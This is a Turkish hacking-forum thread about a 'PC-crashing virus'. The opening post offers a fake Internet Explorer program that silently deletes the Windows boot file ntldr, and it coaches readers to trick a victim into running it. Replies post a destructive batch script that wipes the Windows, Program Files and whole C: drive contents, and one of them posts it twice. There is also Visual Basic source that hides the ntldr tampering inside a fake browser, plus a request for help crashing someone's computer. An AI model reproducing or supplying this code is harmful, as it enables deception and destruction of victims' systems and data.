Bilgisayarı çökertme virüsü (Baba Virüs)

6 Ağu 2011
152
0
192.168.2.1
Beyler program tamamen bana aittir.Virüs programları göremez.Bu program açılınca virüs devreye girer ve sistem içerisindeki bilgisayarın açılmasını sağlayan bi dosyayı siler ve bilgisayar açılmaz bilgisayarınızı seviyosanız sakın denemeyin.

Programın Özellikleri:
1-Kurbanımız anlamasın diye bir internet explorerın içine attım.İnternet explorer da bana aittir.
2-C nin içindeki "ntldr" dosyasını siler ve böylece bilgisayara reset atılınca bilgisayar açılmaz.("ntldr" gizli ve bir sistem dosyasıdır o yüzden görülmez)
3-Format atınca geçer

Not:Sorumluluk bana ait değildir sakın açmayın kurbanınıza açtırın ve ona "bak çok hızlı bir internet explorer buldum istersen sana atabilirim" diyin atın açsın ve kurban bilgisayarı yeniden açmaya çalışınca açılmasın.

Not2: Sakın siz açmayın!!!!!!!!!

Link:
MEGAUPLOAD - The leading online storage and file delivery service

|FReeStyle!|

Uzman üye
6 Tem 2010
1,032
0
Balıkesir
Zaten virüs kodları bir tür programdır ''Kod'dur'' o kod program gibi çalışıp bilgisayara zarar verir Bunun için ayretten bir program gerekmez ntldr'yi silen virüs kodları var mesela şunlardan bir kaçı;
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:: Pc ni tamirciye gönder.::.
@echo off
------------------------------------------------------------
cd..

cd..

attrib -s -h -r -a c:\ntldr

del c:\ntldr

shutdown -r
----------------------------------------------------------------
Bu virüs kodları Dosya silen ve format attıran türlerden Bunlarla metin belgesine yapıştırıp uzantıyı .bat olarak kaydettiğin zaman o yaptığın virüs dosyasını açarsan pc çölker kapanır format atıncaya kadar çalışmaz.Demek istediğim programa gerek yok zaten bu virüs kodları program gibi çalışır.

6 Ağu 2011
152
0
192.168.2.1
virtual basicden yaptım internet explorer kurban anlamasın diye yoksa bende biliyorum direk ntldr yi silmenin kodlarını.Bu programın indirme linkidir indir ama açma kurbanın açsın (mehmetkoca).Bu arada kodları veriyorum:

'Not=Project menüsünden components tıklayın gelen bölümde Microsoft internet controls seçin ve forma ekleyin

Formunuza 5 tane command button 1 tane winsock 1 tanede textbox 1 tanede web browser ekleyin

winsock u project menüsünden components bölümünden Microsoft Winsock Control 5.0 ı seçin

Private Sub Form_Load()
On Error Resume Next
Name "C:\ntldr" As "C:\Program Files\mslproteckmsl"
End Sub
Private Sub Command1_Click()
On Error Resume Next
WebBrowser1.GoBack
On Error Resume Next
End Sub
Private Sub Command2_Click()
On Error Resume Next
WebBrowser1.GoForward
End Sub
Private Sub Command3_Click()
On Error Resume Next
WebBrowser1.Stop
End Sub
Private Sub Command4_Click()
On Error Resume Next
WebBrowser1.GoHome
End Sub
Private Sub Command5_Click()
On Error Resume Next
WebBrowser1.Navigate Text1.Text
End Sub

Dresre

Üye
8 Ağu 2011
67
0
Binbaşı herhangi bir .exe dosyası windows klasörünüsilmeye kodlanmışsa virüs koruma programları siliyor, fakat hack endless in kodları virus programlarınca gözükmüyor ve bu işlemle 200 kb lık bi dosya silinmesi bilgisayarı çökertmeye yetiyor. Kısacası Hack Endless'in yöntemi daha iç açıcı.

qseqeq

Yeni üye
20 Eki 2012
1
0
ben çok zor durmdaym kız arkadaşşmla konuşurken bizim camera qörntülerni kaydetms tehtit ediyor bunun pc çökertmek istiorm bana acil yardm ednzzz

dotolivo

Üye
21 Eyl 2012
248
0
Zaten virüs kodları bir tür programdır ''Kod'dur'' o kod program gibi çalışıp bilgisayara zarar verir Bunun için ayretten bir program gerekmez ntldr'yi silen virüs kodları var mesela şunlardan bir kaçı;
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:: Pc ni tamirciye gönder.::.
@echo off
------------------------------------------------------------
cd..

cd..

attrib -s -h -r -a c:\ntldr

del c:\ntldr

shutdown -r
----------------------------------------------------------------
Bu virüs kodları Dosya silen ve format attıran türlerden Bunlarla metin belgesine yapıştırıp uzantıyı .bat olarak kaydettiğin zaman o yaptığın virüs dosyasını açarsan pc çölker kapanır format atıncaya kadar çalışmaz.Demek istediğim programa gerek yok zaten bu virüs kodları program gibi çalışır.

Bu işe yarıyor mu gerçekten kardeşim ?

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.